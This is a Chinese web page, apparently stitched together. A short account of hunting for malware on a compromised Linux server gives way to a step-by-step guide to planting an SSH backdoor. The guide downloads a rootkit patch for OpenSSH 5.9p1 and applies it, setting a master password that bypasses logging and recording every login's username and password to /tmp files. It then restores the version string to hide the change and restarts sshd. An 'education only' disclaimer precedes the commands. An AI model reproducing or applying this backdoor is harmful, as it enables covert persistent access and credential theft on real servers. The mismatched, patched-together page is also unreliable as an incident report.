阿里论坛有一篇肉鸡类问题排查思路的文章,按照上面的思路找了找没发现异常登录,没有头绪。可以通过tcpdump命令进行抓包,我将抓取的数据存入一个文件之后进行观察抓包文件可以通过一些工具进行分析,我用Wiresherk查看了一下,发现服务器不断向美国、香港等服务器发包。但是仍没有进攻行为,还是没能找到程序所在。当下做了个决定,既然暂时找不到,就先封锁他的行为吧。这样一定程度上阻止了异地的访问重启服apache务器,这样恶意发的包就发不出去,带宽占用又降回正常了。但是病毒文件还是没有找到,仍在排查。
阿里论坛有一篇防止PHPDDOS攻击的文章
特别提示:仅用于安全测试和教学,禁止非法用途。其实就是个ssh后门,基本可以不用看内核版本,很简单,为照顾新手!
地址在这https://core.ipsecs.com/rootkit/patch-to-hack/(已被墙)我以 openssh 5.9 centos 5.6 做演示,在这里找到对应的openssh版本 https://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/
安装前首先
ssh -V
记录下原来ssh版本信息,免得安装后一看就版本不一样了
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff //patch 后门
vi includes.h //修改后门密码,记录文件位置,
/*
+#define ILOG “/tmp/ilog” //记录登录到本机的用户名和密码
+#define OLOG “/tmp/olog” //记录本机登录到远程的用户名和密码
+#define SECRETPW “123456654321” //你后门的密码
*/
vi version.h //修改ssh版本信息,改成原来的
先安装所需环境不然会报错
yum install -y openssl openssl-devel pam-devel
./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kerberos5
注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log,需要安装zlib
yum install -y zlib zlib-devel // http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download 需要 make clean
make && make install
service sshd restart //重启sshd
然后我们登录ssh看看
再ssh localhost看看
使用后门密码登录是不会被记录的
后门,记录一举两得,是不是很简单
以上就是关于【Linux】服务器被植入后门程序排查实录,全部的内容,包括:【Linux】服务器被植入后门程序、如何使用Linux通用后门、等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
